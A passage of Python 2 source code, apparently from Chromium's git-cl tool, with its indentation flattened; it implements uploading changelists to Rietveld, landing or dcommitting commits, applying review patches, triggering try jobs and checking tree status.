# rietveld.cc only addresses which we can send private CLs to are listed
# if rietveld.private is set, and so we should ignore rietveld.cc only when
# --private is specified explicitly on the command line.
if options.private:
logging.warn('rietveld.cc is ignored since private flag is specified. '
'You need to review and add them manually if necessary.')
cc = cl.GetCCListWithoutDefault()
else:
cc = cl.GetCCList()
cc = ','.join(filter(None, (cc, ','.join(options.cc))))
if cc:
upload_args.extend(['--cc', cc])
if options.private or settings.GetDefaultPrivateFlag() == "True":
upload_args.append('--private')
upload_args.extend(['--git_similarity', str(options.similarity)])
if not options.find_copies:
upload_args.extend(['--git_no_find_copies'])
# Include the upstream repo's URL in the change -- this is useful for
# projects that have their source spread across multiple repos.
remote_url = cl.GetGitBaseUrlFromConfig()
if not remote_url:
if settings.GetIsGitSvn():
remote_url = cl.GetGitSvnRemoteUrl()
else:
if cl.GetRemoteUrl() and '/' in cl.GetUpstreamBranch():
remote_url = (cl.GetRemoteUrl() + '@'
+ cl.GetUpstreamBranch().split('/')[-1])
if remote_url:
upload_args.extend(['--base_url', remote_url])
remote, remote_branch = cl.GetRemoteBranch()
target_ref = GetTargetRef(remote, remote_branch, options.target_branch,
settings.GetPendingRefPrefix())
if target_ref:
upload_args.extend(['--target_ref', target_ref])
project = settings.GetProject()
if project:
upload_args.extend(['--project', project])
try:
upload_args = ['upload'] + upload_args + args
logging.info('upload.RealMain(%s)', upload_args)
issue, patchset = upload.RealMain(upload_args)
issue = int(issue)
patchset = int(patchset)
except KeyboardInterrupt:
sys.exit(1)
except:
# If we got an exception after the user typed a description for their
# change, back up the description before re-raising.
if change_desc:
backup_path = os.path.expanduser(DESCRIPTION_BACKUP_FILE)
print '\nGot exception while uploading -- saving description to %s\n' \
% backup_path
backup_file = open(backup_path, 'w')
backup_file.write(change_desc.description)
backup_file.close()
raise
if not cl.GetIssue():
cl.SetIssue(issue)
cl.SetPatchset(patchset)
if options.use_commit_queue:
cl.SetFlag('commit', '1')
return 0
def cleanup_list(l):
"""Fixes a list so that comma separated items are put as individual items.
So that "--reviewers joe@c,john@c --reviewers joa@c" results in
options.reviewers == sorted(['joe@c', 'john@c', 'joa@c']).
"""
items = sum((i.split(',') for i in l), [])
stripped_items = (i.strip() for i in items)
return sorted(filter(None, stripped_items))
@subcommand.usage('[args to "git diff"]')
def CMDupload(parser, args):
"""Uploads the current changelist to codereview."""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('--bypass-watchlists', action='store_true',
dest='bypass_watchlists',
help='bypass watchlists auto CC-ing reviewers')
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-m', dest='message', help='message for patchset')
parser.add_option('-t', dest='title', help='title for patchset')
parser.add_option('-r', '--reviewers',
action='append', default=[],
help='reviewer email addresses')
parser.add_option('--cc',
action='append', default=[],
help='cc email addresses')
parser.add_option('-s', '--send-mail', action='store_true',
help='send email to reviewer immediately')
parser.add_option('--emulate_svn_auto_props',
'--emulate-svn-auto-props',
action="store_true",
dest="emulate_svn_auto_props",
help="Emulate Subversion's auto properties feature.")
parser.add_option('-c', '--use-commit-queue', action='store_true',
help='tell the commit queue to commit this patchset')
parser.add_option('--private', action='store_true',
help='set the review private (rietveld only)')
parser.add_option('--target_branch',
'--target-branch',
metavar='TARGET',
help='Apply CL to remote ref TARGET. ' +
'Default: remote branch head, or master')
parser.add_option('--email', default=None,
help='email address to use to connect to Rietveld')
parser.add_option('--tbr-owners', dest='tbr_owners', action='store_true',
help='add a set of OWNERS to TBR')
add_git_similarity(parser)
(options, args) = parser.parse_args(args)
if is_dirty_git_tree('upload'):
return 1
options.reviewers = cleanup_list(options.reviewers)
options.cc = cleanup_list(options.cc)
cl = Changelist()
if args:
# TODO(ukai): is it ok for gerrit case?
base_branch = args[0]
else:
if cl.GetBranch() is None:
DieWithError('Can\'t upload from detached HEAD state. Get on a branch!')
# Default to diffing against common ancestor of upstream branch
base_branch = cl.GetCommonAncestorWithUpstream()
args = [base_branch, 'HEAD']
# Apply watchlists on upload.
change = cl.GetChange(base_branch, None)
watchlist = watchlists.Watchlists(change.RepositoryRoot())
files = [f.LocalPath() for f in change.AffectedFiles()]
if not options.bypass_watchlists:
cl.SetWatchers(watchlist.GetWatchersForPaths(files))
if not options.bypass_hooks:
if options.reviewers or options.tbr_owners:
# Set the reviewer list now so that presubmit checks can access it.
change_description = ChangeDescription(change.FullDescriptionText())
change_description.update_reviewers(options.reviewers,
options.tbr_owners,
change)
change.SetDescriptionText(change_description.description)
hook_results = cl.RunHook(committing=False,
may_prompt=not options.force,
verbose=options.verbose,
change=change)
if not hook_results.should_continue():
return 1
if not options.reviewers and hook_results.reviewers:
options.reviewers = hook_results.reviewers.split(',')
if cl.GetIssue():
latest_patchset = cl.GetMostRecentPatchset()
local_patchset = cl.GetPatchset()
if latest_patchset and local_patchset and local_patchset != latest_patchset:
print ('The last upload made from this repository was patchset #%d but '
'the most recent patchset on the server is #%d.'
% (local_patchset, latest_patchset))
print ('Uploading will still work, but if you\'ve uploaded to this issue '
'from another machine or branch the patch you\'re uploading now '
'might not include those changes.')
ask_for_data('About to upload; enter to confirm.')
print_stats(options.similarity, options.find_copies, args)
if settings.GetIsGerrit():
return GerritUpload(options, args, cl, change)
ret = RietveldUpload(options, args, cl, change)
if not ret:
git_set_branch_value('last-upload-hash',
RunGit(['rev-parse', 'HEAD']).strip())
return ret
def IsSubmoduleMergeCommit(ref):
# When submodules are added to the repo, we expect there to be a single
# non-git-svn merge commit at remote HEAD with a signature comment.
pattern = '^SVN changes up to revision [0-9]*$'
cmd = ['rev-list', '--merges', '--grep=%s' % pattern, '%s^!' % ref]
return RunGit(cmd) != ''
def SendUpstream(parser, args, cmd):
"""Common code for CMDland and CmdDCommit
Squashes branch into a single commit.
Updates changelog with metadata (e.g. pointer to review).
Pushes/dcommits the code upstream.
Updates review and closes.
"""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('-m', dest='message',
help="override review description")
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-c', dest='contributor',
help="external contributor for patch (appended to " +
"description and used as author for git). Should be " +
"formatted as 'First Last <email@example.com>'")
add_git_similarity(parser)
(options, args) = parser.parse_args(args)
cl = Changelist()
current = cl.GetBranch()
remote, upstream_branch = cl.FetchUpstreamTuple(cl.GetBranch())
if not settings.GetIsGitSvn() and remote == '.':
print
print 'Attempting to push branch %r into another local branch!' % current
print
print 'Either reparent this branch on top of origin/master:'
print ' git reparent-branch --root'
print
print 'OR run `git rebase-update` if you think the parent branch is already'
print 'committed.'
print
print ' Current parent: %r' % upstream_branch
return 1
if not args or cmd == 'land':
# Default to merging against our best guess of the upstream branch.
args = [cl.GetUpstreamBranch()]
if options.contributor:
if not re.match('^.*\s<\S+@\S+>$', options.contributor):
print "Please provide contibutor as 'First Last <email@example.com>'"
return 1
base_branch = args[0]
base_has_submodules = IsSubmoduleMergeCommit(base_branch)
if is_dirty_git_tree(cmd):
return 1
# This rev-list syntax means "show all commits not in my branch that
# are in base_branch".
upstream_commits = RunGit(['rev-list', '^' + cl.GetBranchRef(),
base_branch]).splitlines()
if upstream_commits:
print ('Base branch "%s" has %d commits '
'not in this branch.' % (base_branch, len(upstream_commits)))
print 'Run "git merge %s" before attempting to %s.' % (base_branch, cmd)
return 1
# This is the revision `svn dcommit` will commit on top of.
svn_head = None
if cmd == 'dcommit' or base_has_submodules:
svn_head = RunGit(['log', '--grep=^git-svn-id:', '-1',
'--pretty=format:%H'])
if cmd == 'dcommit':
# If the base_head is a submodule merge commit, the first parent of the
# base_head should be a git-svn commit, which is what we're interested in.
base_svn_head = base_branch
if base_has_submodules:
base_svn_head += '^1'
extra_commits = RunGit(['rev-list', '^' + svn_head, base_svn_head])
if extra_commits:
print ('This branch has %d additional commits not upstreamed yet.'
% len(extra_commits.splitlines()))
print ('Upstream "%s" or rebase this branch on top of the upstream trunk '
'before attempting to %s.' % (base_branch, cmd))
return 1
merge_base = RunGit(['merge-base', base_branch, 'HEAD']).strip()
if not options.bypass_hooks:
author = None
if options.contributor:
author = re.search(r'\<(.*)\>', options.contributor).group(1)
hook_results = cl.RunHook(
committing=True,
may_prompt=not options.force,
verbose=options.verbose,
change=cl.GetChange(merge_base, author))
if not hook_results.should_continue():
return 1
# Check the tree status if the tree status URL is set.
status = GetTreeStatus()
if 'closed' == status:
print('The tree is closed. Please wait for it to reopen. Use '
'"git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
elif 'unknown' == status:
print('Unable to determine tree status. Please verify manually and '
'use "git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
else:
breakpad.SendStack(
'GitClHooksBypassedCommit',
'Issue %s/%s bypassed hook when committing (tree status was "%s")' %
(cl.GetRietveldServer(), cl.GetIssue(), GetTreeStatus()),
verbose=False)
change_desc = ChangeDescription(options.message)
if not change_desc.description and cl.GetIssue():
change_desc = ChangeDescription(cl.GetDescription())
if not change_desc.description:
if not cl.GetIssue() and options.bypass_hooks:
change_desc = ChangeDescription(CreateDescriptionFromLog([merge_base]))
else:
print 'No description set.'
print 'Visit %s/edit to set it.' % (cl.GetIssueURL())
return 1
# Keep a separate copy for the commit message, because the commit message
# contains the link to the Rietveld issue, while the Rietveld message contains
# the commit viewvc url.
if cl.GetIssue():
change_desc.update_reviewers(cl.GetApprovingReviewers())
commit_desc = ChangeDescription(change_desc.description)
if cl.GetIssue():
commit_desc.append_footer('Review URL: %s' % cl.GetIssueURL())
if options.contributor:
commit_desc.append_footer('Patch from %s.' % options.contributor)
print('Description:')
print(commit_desc.description)
branches = [merge_base, cl.GetBranchRef()]
if not options.force:
print_stats(options.similarity, options.find_copies, branches)
# We want to squash all this branch's commits into one commit with the proper
# description. We do this by doing a "reset --soft" to the base branch (which
# keeps the working copy the same), then dcommitting that. If origin/master
# has a submodule merge commit, we'll also need to cherry-pick the squashed
# commit onto a branch based on the git-svn head.
MERGE_BRANCH = 'git-cl-commit'
CHERRY_PICK_BRANCH = 'git-cl-cherry-pick'
# Delete the branches if they exist.
for branch in [MERGE_BRANCH, CHERRY_PICK_BRANCH]:
showref_cmd = ['show-ref', '--quiet', '--verify', 'refs/heads/%s' % branch]
result = RunGitWithCode(showref_cmd)
if result[0] == 0:
RunGit(['branch', '-D', branch])
# We might be in a directory that's present in this branch but not in the
# trunk. Move up to the top of the tree so that git commands that expect a
# valid CWD won't fail after we check out the merge branch.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Stuff our change into the merge branch.
# We wrap in a try...finally block so if anything goes wrong,
# we clean up the branches.
retcode = -1
pushed_to_pending = False
pending_ref = None
revision = None
try:
RunGit(['checkout', '-q', '-b', MERGE_BRANCH])
RunGit(['reset', '--soft', merge_base])
if options.contributor:
RunGit(
[
'commit', '--author', options.contributor,
'-m', commit_desc.description,
])
else:
RunGit(['commit', '-m', commit_desc.description])
if base_has_submodules:
cherry_pick_commit = RunGit(['rev-list', 'HEAD^!']).rstrip()
RunGit(['branch', CHERRY_PICK_BRANCH, svn_head])
RunGit(['checkout', CHERRY_PICK_BRANCH])
RunGit(['cherry-pick', cherry_pick_commit])
if cmd == 'land':
remote, branch = cl.FetchUpstreamTuple(cl.GetBranch())
pending_prefix = settings.GetPendingRefPrefix()
if not pending_prefix or branch.startswith(pending_prefix):
# If not using refs/pending/heads/* at all, or target ref is already set
# to pending, then push to the target ref directly.
retcode, output = RunGitWithCode(
['push', '--porcelain', remote, 'HEAD:%s' % branch])
pushed_to_pending = pending_prefix and branch.startswith(pending_prefix)
else:
# Cherry-pick the change on top of pending ref and then push it.
assert branch.startswith('refs/'), branch
assert pending_prefix[-1] == '/', pending_prefix
pending_ref = pending_prefix + branch[len('refs/'):]
retcode, output = PushToGitPending(remote, pending_ref, branch)
pushed_to_pending = (retcode == 0)
if retcode == 0:
revision = RunGit(['rev-parse', 'HEAD']).strip()
else:
# dcommit the merge branch.
cmd_args = [
'svn', 'dcommit',
'-C%s' % options.similarity,
'--no-rebase', '--rmdir',
]
if settings.GetForceHttpsCommitUrl():
# Allow forcing https commit URLs for some projects that don't allow
# committing to http URLs (like Google Code).
remote_url = cl.GetGitSvnRemoteUrl()
if urlparse.urlparse(remote_url).scheme == 'http':
remote_url = remote_url.replace('http://', 'https://')
cmd_args.append('--commit-url=%s' % remote_url)
_, output = RunGitWithCode(cmd_args)
if 'Committed r' in output:
revision = re.match(
'.*?\nCommitted r(\\d+)', output, re.DOTALL).group(1)
logging.debug(output)
finally:
# And then swap back to the original branch and clean up.
RunGit(['checkout', '-q', cl.GetBranch()])
RunGit(['branch', '-D', MERGE_BRANCH])
if base_has_submodules:
RunGit(['branch', '-D', CHERRY_PICK_BRANCH])
if not revision:
print 'Failed to push. If this persists, please file a bug.'
return 1
killed = False
if pushed_to_pending:
try:
revision = WaitForRealCommit(remote, revision, base_branch, branch)
# We set pushed_to_pending to False, since it made it all the way to the
# real ref.
pushed_to_pending = False
except KeyboardInterrupt:
killed = True
if cl.GetIssue():
to_pending = ' to pending queue' if pushed_to_pending else ''
viewvc_url = settings.GetViewVCUrl()
if not to_pending:
if viewvc_url and revision:
change_desc.append_footer(
'Committed: %s%s' % (viewvc_url, revision))
elif revision:
change_desc.append_footer('Committed: %s' % (revision,))
print ('Closing issue '
'(you may be prompted for your codereview password)...')
cl.UpdateDescription(change_desc.description)
cl.CloseIssue()
props = cl.GetIssueProperties()
patch_num = len(props['patchsets'])
comment = "Committed patchset #%d (id:%d)%s manually as %s" % (
patch_num, props['patchsets'][-1], to_pending, revision)
if options.bypass_hooks:
comment += ' (tree was closed).' if GetTreeStatus() == 'closed' else '.'
else:
comment += ' (presubmit successful).'
cl.RpcServer().add_comment(cl.GetIssue(), comment)
cl.SetIssue(None)
if pushed_to_pending:
_, branch = cl.FetchUpstreamTuple(cl.GetBranch())
print 'The commit is in the pending queue (%s).' % pending_ref
print (
'It will show up on %s in ~1 min, once it gets a Cr-Commit-Position '
'footer.' % branch)
hook = POSTUPSTREAM_HOOK_PATTERN % cmd
if os.path.isfile(hook):
RunCommand([hook, merge_base], error_ok=True)
return 1 if killed else 0
def WaitForRealCommit(remote, pushed_commit, local_base_ref, real_ref):
print
print 'Waiting for commit to be landed on %s...' % real_ref
print '(If you are impatient, you may Ctrl-C once without harm)'
target_tree = RunGit(['rev-parse', '%s:' % pushed_commit]).strip()
current_rev = RunGit(['rev-parse', local_base_ref]).strip()
loop = 0
while True:
sys.stdout.write('fetching (%d)... \r' % loop)
sys.stdout.flush()
loop += 1
RunGit(['retry', 'fetch', remote, real_ref], stderr=subprocess2.VOID)
to_rev = RunGit(['rev-parse', 'FETCH_HEAD']).strip()
commits = RunGit(['rev-list', '%s..%s' % (current_rev, to_rev)])
for commit in commits.splitlines():
if RunGit(['rev-parse', '%s:' % commit]).strip() == target_tree:
print 'Found commit on %s' % real_ref
return commit
current_rev = to_rev
def PushToGitPending(remote, pending_ref, upstream_ref):
"""Fetches pending_ref, cherry-picks current HEAD on top of it, pushes.
Returns:
(retcode of last operation, output log of last operation).
"""
assert pending_ref.startswith('refs/'), pending_ref
local_pending_ref = 'refs/git-cl/' + pending_ref[len('refs/'):]
cherry = RunGit(['rev-parse', 'HEAD']).strip()
code = 0
out = ''
max_attempts = 3
attempts_left = max_attempts
while attempts_left:
if attempts_left != max_attempts:
print 'Retrying, %d attempts left...' % (attempts_left - 1,)
attempts_left -= 1
# Fetch. Retry fetch errors.
print 'Fetching pending ref %s...' % pending_ref
code, out = RunGitWithCode(
['retry', 'fetch', remote, '+%s:%s' % (pending_ref, local_pending_ref)])
if code:
print 'Fetch failed with exit code %d.' % code
if out.strip():
print out.strip()
continue
# Try to cherry pick. Abort on merge conflicts.
print 'Cherry-picking commit on top of pending ref...'
RunGitWithCode(['checkout', local_pending_ref], suppress_stderr=True)
code, out = RunGitWithCode(['cherry-pick', cherry])
if code:
print (
'Your patch doesn\'t apply cleanly to ref \'%s\', '
'the following files have merge conflicts:' % pending_ref)
print RunGit(['diff', '--name-status', '--diff-filter=U']).strip()
print 'Please rebase your patch and try again.'
RunGitWithCode(['cherry-pick', '--abort'])
return code, out
# Applied cleanly, try to push now. Retry on error (flake or non-ff push).
print 'Pushing commit to %s... It can take a while.' % pending_ref
code, out = RunGitWithCode(
['retry', 'push', '--porcelain', remote, 'HEAD:%s' % pending_ref])
if code == 0:
# Success.
print 'Commit pushed to pending ref successfully!'
return code, out
print 'Push failed with exit code %d.' % code
if out.strip():
print out.strip()
if IsFatalPushFailure(out):
print (
'Fatal push error. Make sure your .netrc credentials and git '
'user.email are correct and you have push access to the repo.')
return code, out
print 'All attempts to push to pending ref failed.'
return code, out
def IsFatalPushFailure(push_stdout):
"""True if retrying push won't help."""
return '(prohibited by Gerrit)' in push_stdout
@subcommand.usage('[upstream branch to apply against]')
def CMDdcommit(parser, args):
"""Commits the current changelist via git-svn."""
if not settings.GetIsGitSvn():
message = """This doesn't appear to be an SVN repository.
If your project has a git mirror with an upstream SVN master, you probably need
to run 'git svn init', see your project's git mirror documentation.
If your project has a true writeable upstream repository, you probably want
to run 'git cl land' instead.
Choose wisely; if you get this wrong, your commit might appear to succeed but
will instead be silently ignored."""
print(message)
ask_for_data('[Press enter to dcommit or ctrl-C to quit]')
return SendUpstream(parser, args, 'dcommit')
@subcommand.usage('[upstream branch to apply against]')
def CMDland(parser, args):
"""Commits the current changelist via git."""
if settings.GetIsGitSvn():
print('This appears to be an SVN repository.')
print('Are you sure you didn\'t mean \'git cl dcommit\'?')
ask_for_data('[Press enter to push or ctrl-C to quit]')
return SendUpstream(parser, args, 'land')
@subcommand.usage('<patch url or issue id>')
def CMDpatch(parser, args):
"""Patches in a code review."""
parser.add_option('-b', dest='newbranch',
help='create a new branch off trunk for the patch')
parser.add_option('-f', '--force', action='store_true',
help='with -b, clobber any existing branch')
parser.add_option('-d', '--directory', action='store', metavar='DIR',
help='Change to the directory DIR immediately, '
'before doing anything else.')
parser.add_option('--reject', action='store_true',
help='failed patches spew .rej files rather than '
'attempting a 3-way merge')
parser.add_option('-n', '--no-commit', action='store_true', dest='nocommit',
help="don't commit after patch applies")
(options, args) = parser.parse_args(args)
if len(args) != 1:
parser.print_help()
return 1
issue_arg = args[0]
# TODO(maruel): Use apply_issue.py
# TODO(ukai): use gerrit-cherry-pick for gerrit repository?
if options.newbranch:
if options.force:
RunGit(['branch', '-D', options.newbranch],
stderr=subprocess2.PIPE, error_ok=True)
RunGit(['checkout', '-b', options.newbranch,
Changelist().GetUpstreamBranch()])
return PatchIssue(issue_arg, options.reject, options.nocommit,
options.directory)
def PatchIssue(issue_arg, reject, nocommit, directory):
if type(issue_arg) is int or issue_arg.isdigit():
# Input is an issue id. Figure out the URL.
issue = int(issue_arg)
cl = Changelist(issue=issue)
patchset = cl.GetMostRecentPatchset()
patch_data = cl.GetPatchSetDiff(issue, patchset)
else:
# Assume it's a URL to the patch. Default to https.
issue_url = gclient_utils.UpgradeToHttps(issue_arg)
match = re.match(r'.*?/issue(\d+)_(\d+).diff', issue_url)
if not match:
DieWithError('Must pass an issue ID or full URL for '
'\'Download raw patch set\'')
issue = int(match.group(1))
patchset = int(match.group(2))
patch_data = urllib2.urlopen(issue_arg).read()
# Switch up to the top-level directory, if necessary, in preparation for
# applying the patch.
top = settings.GetRelativeRoot()
if top:
os.chdir(top)
# Git patches have a/ at the beginning of source paths. We strip that out
# with a sed script rather than the -p flag to patch so we can feed either
# Git or svn-style patches into the same apply command.
# re.sub() should be used but flags=re.MULTILINE is only in python 2.7.
try:
patch_data = subprocess2.check_output(
['sed', '-e', 's|^--- a/|--- |; s|^+++ b/|+++ |'], stdin=patch_data)
except subprocess2.CalledProcessError:
    DieWithError('Git patch munging failed.')
logging.info(patch_data)
# We use "git apply" to apply the patch instead of "patch" so that we can
# pick up file adds.
# The --index flag means: also insert into the index (so we catch adds).
cmd = ['git', 'apply', '--index', '-p0']
if directory:
cmd.extend(('--directory', directory))
if reject:
cmd.append('--reject')
elif IsGitVersionAtLeast('1.7.12'):
cmd.append('--3way')
try:
subprocess2.check_call(cmd, env=GetNoGitPagerEnv(),
stdin=patch_data, stdout=subprocess2.VOID)
except subprocess2.CalledProcessError:
DieWithError('Failed to apply the patch')
# If we had an issue, commit the current state and register the issue.
if not nocommit:
RunGit(['commit', '-m', ('patch from issue %(i)s at patchset '
'%(p)s (http://crrev.com/%(i)s#ps%(p)s)'
% {'i': issue, 'p': patchset})])
cl = Changelist()
cl.SetIssue(issue)
cl.SetPatchset(patchset)
print "Committed patch locally."
else:
print "Patch applied to index."
return 0
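# PatchIssue accepts either a bare issue id or a raw-patch URL; both calls
# below are hypothetical examples:
#   PatchIssue('12345', reject=False, nocommit=False, directory=None)
#   PatchIssue('https://codereview.example.com/download/issue12345_1.diff',
#              reject=False, nocommit=False, directory=None)
# The URL form must end in 'issue<issue>_<patchset>.diff' so the regex above
# can recover both numbers.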
def CMDrebase(parser, args):
"""Rebases current branch on top of svn repo."""
# Provide a wrapper for git svn rebase to help avoid accidental
# git svn dcommit.
# It's the only command that doesn't use parser at all since we just defer
# execution to git-svn.
return RunGitWithCode(['svn', 'rebase'] + args)[1]
def GetTreeStatus(url=None):
"""Fetches the tree status and returns either 'open', 'closed',
'unknown' or 'unset'."""
url = url or settings.GetTreeStatusUrl(error_ok=True)
if url:
status = urllib2.urlopen(url).read().lower()
if status.find('closed') != -1 or status == '0':
return 'closed'
elif status.find('open') != -1 or status == '1':
return 'open'
return 'unknown'
return 'unset'
def GetTreeStatusReason():
"""Fetches the tree status from a json url and returns the message
with the reason for the tree to be opened or closed."""
url = settings.GetTreeStatusUrl()
json_url = urlparse.urljoin(url, '/current?format=json')
connection = urllib2.urlopen(json_url)
status = json.loads(connection.read())
connection.close()
return status['message']
def GetBuilderMaster(bot_list):
"""For a given builder, fetch the master from AE if available."""
map_url = 'https://builders-map.appspot.com/'
try:
master_map = json.load(urllib2.urlopen(map_url))
except urllib2.URLError as e:
return None, ('Failed to fetch builder-to-master map from %s. Error: %s.' %
(map_url, e))
except ValueError as e:
return None, ('Invalid json string from %s. Error: %s.' % (map_url, e))
if not master_map:
return None, 'Failed to build master map.'
result_master = ''
for bot in bot_list:
builder = bot.split(':', 1)[0]
master_list = master_map.get(builder, [])
if not master_list:
return None, ('No matching master for builder %s.' % builder)
elif len(master_list) > 1:
return None, ('The builder name %s exists in multiple masters %s.' %
(builder, master_list))
else:
cur_master = master_list[0]
if not result_master:
result_master = cur_master
elif result_master != cur_master:
return None, 'The builders do not belong to the same master.'
return result_master, None
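# The builders-map service is expected to return JSON mapping a builder name
# to the list of masters that own it, roughly (hypothetical names):
#   {"linux_rel": ["tryserver.chromium.linux"]}
# GetBuilderMaster(['linux_rel:compile']) would then yield
# ('tryserver.chromium.linux', None); missing or ambiguous masters produce an
# error message instead.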
def CMDtree(parser, args):
"""Shows the status of the tree."""
_, args = parser.parse_args(args)
status = GetTreeStatus()
if 'unset' == status:
print 'You must configure your tree status URL by running "git cl config".'
return 2
print "The tree is %s" % status
print
print GetTreeStatusReason()
if status != 'open':
return 1
return 0
def CMDtry(parser, args):
"""Triggers a try job through Rietveld."""
group = optparse.OptionGroup(parser, "Try job options")
group.add_option(
"-b", "--bot", action="append",
help=("IMPORTANT: specify ONE builder per --bot flag. Use it multiple "
"times to specify multiple builders. ex: "
"'-b win_rel -b win_layout'. See "
"the try server waterfall for the builders name and the tests "
"available."))
group.add_option(
"-m", "--master", default='',
help=("Specify a try master where to run the tries."))
group.add_option(
"-r", "--revision",
help="Revision to use for the try job; default: the "
"revision will be determined by the try server; see "
"its waterfall for more info")
group.add_option(
"-c", "--clobber", action="store_true", default=False,
help="Force a clobber before building; e.g. don't do an "
"incremental build")
group.add_option(
"--project",
help="Override which project to use. Projects are defined "
"server-side to define what default bot set to use")
group.add_option(
"-n", "--name", help="Try job name; default to current branch name")
parser.add_option_group(group)
options, args = parser.parse_args(args)
if args:
parser.error('Unknown arguments: %s' % args)
cl = Changelist()
if not cl.GetIssue():
parser.error('Need to upload first')
props = cl.GetIssueProperties()
if props.get('closed'):
parser.error('Cannot send tryjobs for a closed CL')
if props.get('private'):
parser.error('Cannot use trybots with private issue')
if not options.name:
options.name = cl.GetBranch()
if options.bot and not options.master:
options.master, err_msg = GetBuilderMaster(options.bot)
if err_msg:
parser.error('Tryserver master cannot be found because: %s\n'
'Please manually specify the tryserver master'
', e.g. "-m tryserver.chromium.linux".' % err_msg)
def GetMasterMap():
# Process --bot.
if not options.bot:
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
# Get try masters from PRESUBMIT.py files.
masters = presubmit_support.DoGetTryMasters(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if masters:
return masters
# Fall back to deprecated method: get try slaves from PRESUBMIT.py files.
options.bot = presubmit_support.DoGetTrySlaves(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if not options.bot:
parser.error('No default try builder to try, use --bot')
builders_and_tests = {}
# TODO(machenbach): The old style command-line options don't support
# multiple try masters yet.
old_style = filter(lambda x: isinstance(x, basestring), options.bot)
new_style = filter(lambda x: isinstance(x, tuple), options.bot)
for bot in old_style:
if ':' in bot:
parser.error('Specifying testfilter is no longer supported')
elif ',' in bot:
parser.error('Specify one bot per --bot flag')
else:
builders_and_tests.setdefault(bot, []).append('defaulttests')
for bot, tests in new_style:
builders_and_tests.setdefault(bot, []).extend(tests)
# Return a master map with one master to be backwards compatible. The
# master name defaults to an empty string, which will cause the master
# not to be set on rietveld (deprecated).
return {options.master: builders_and_tests}
masters = GetMasterMap()
for builders in masters.itervalues():
if any('triggered' in b for b in builders):
print >> sys.stderr, (
'ERROR You are trying to send a job to a triggered bot. This type of'
' bot requires an\ninitial job from a parent (usually a builder). '
'Instead send your job to the parent.\n'
'Bot list: %s' % builders)
return 1
patchset = cl.GetMostRecentPatchset()
if patchset and patchset != cl.GetPatchset():
print(
'\nWARNING Mismatch between local config and server. Did a previous '
'upload fail?\ngit-cl try always uses latest patchset from rietveld. '
'Continuing using\npatchset %s.\n' % patchset)
try:
cl.RpcServer().trigger_distributed_try_jobs(
cl.GetIssue(), patchset, options.name, options.clobber,
options.revision, masters)
except urllib2.HTTPError, e:
if e.code == 404:
print('404 from rietveld; '
'did you mean to use "git try" instead of "git cl try"?')
return 1
print('Tried jobs on:')
for (master, builders) in masters.iteritems():
if master:
print 'Master: %s' % master
length = max(len(builder) for builder in builders)
for builder in sorted(builders):
print ' %*s: %s' % (length, builder, ','.join(builders[builder]))
return 0
@subcommand.usage('[new upstream branch]')
def CMDupstream(parser, args):
"""Prints or sets the name of the upstream branch, if any."""
_, args = parser.parse_args(args)
if len(args) > 1:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
if args:
# One arg means set upstream branch.
branch = cl.GetBranch()
RunGit(['branch', '--set-upstream', branch, args[0]])
cl = Changelist()
print "Upstream branch set to " + cl.GetUpstreamBranch()
# Clear configured merge-base, if there is one.
git_common.remove_merge_base(branch)
else:
print cl.GetUpstreamBranch()
return 0
def CMDweb(parser, args):
"""Opens the current CL in the web browser."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
issue_url = Changelist().GetIssueURL()
if not issue_url:
print >> sys.stderr, 'ERROR No issue to open'
return 1
webbrowser.open(issue_url)
return 0
def CMDset_commit(parser, args):
"""Sets the commit bit to trigger the Commit Queue."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
props = cl.GetIssueProperties()
if props.get('private'):
parser.error('Cannot set commit on private issue')
cl.SetFlag('commit', '1')
return 0
def CMDset_close(parser, args):
"""Closes the issue."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
# Ensure there actually is an issue to close.
cl.GetDescription()
cl.CloseIssue()
return 0
def CMDdiff(parser, args):
"""shows differences between local tree and last upload."""
cl = Changelist()
issue = cl.GetIssue()
branch = cl.GetBranch()
if not issue:
DieWithError('No issue found for current branch (%s)' % branch)
TMP_BRANCH = 'git-cl-diff'
base_branch = cl.GetCommonAncestorWithUpstream()
# Create a new branch based on the merge-base
RunGit(['checkout', '-q', '-b', TMP_BRANCH, base_branch])
try:
# Patch in the latest changes from rietveld.
rtn = PatchIssue(issue, False, False, None)
if rtn != 0:
return rtn
# Switch back to starting branch and diff against the temporary
# branch containing the latest rietveld patch.
subprocess2.check_call(['git', 'diff', TMP_BRANCH, branch, '--'])
finally:
RunGit(['checkout', '-q', branch])
RunGit(['branch', '-D', TMP_BRANCH])
return 0
def CMDowners(parser, args):
"""interactively find the owners for reviewing"""
parser.add_option(
'--no-color',
action='store_true',
help='Use this option to disable color output')
options, args = parser.parse_args(args)
author = RunGit(['config', 'user.email']).strip() or None
cl = Changelist()
if args:
if len(args) > 1:
parser.error('Unknown args')
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
change = cl.GetChange(base_branch, None)
return owners_finder.OwnersFinder(
[f.LocalPath() for f in
cl.GetChange(base_branch, None).AffectedFiles()],
change.RepositoryRoot(), author,
fopen=file, os_path=os.path, glob=glob.glob,
disable_color=options.no_color).run()
@subcommand.usage('[files or directories to diff]')
def CMDformat(parser, args):
"""Runs clang-format on the diff."""
CLANG_EXTS = ['.cc', '.cpp', '.h', '.mm', '.proto', '.java']
parser.add_option('--full', action='store_true',
help='Reformat the full content of all touched files')
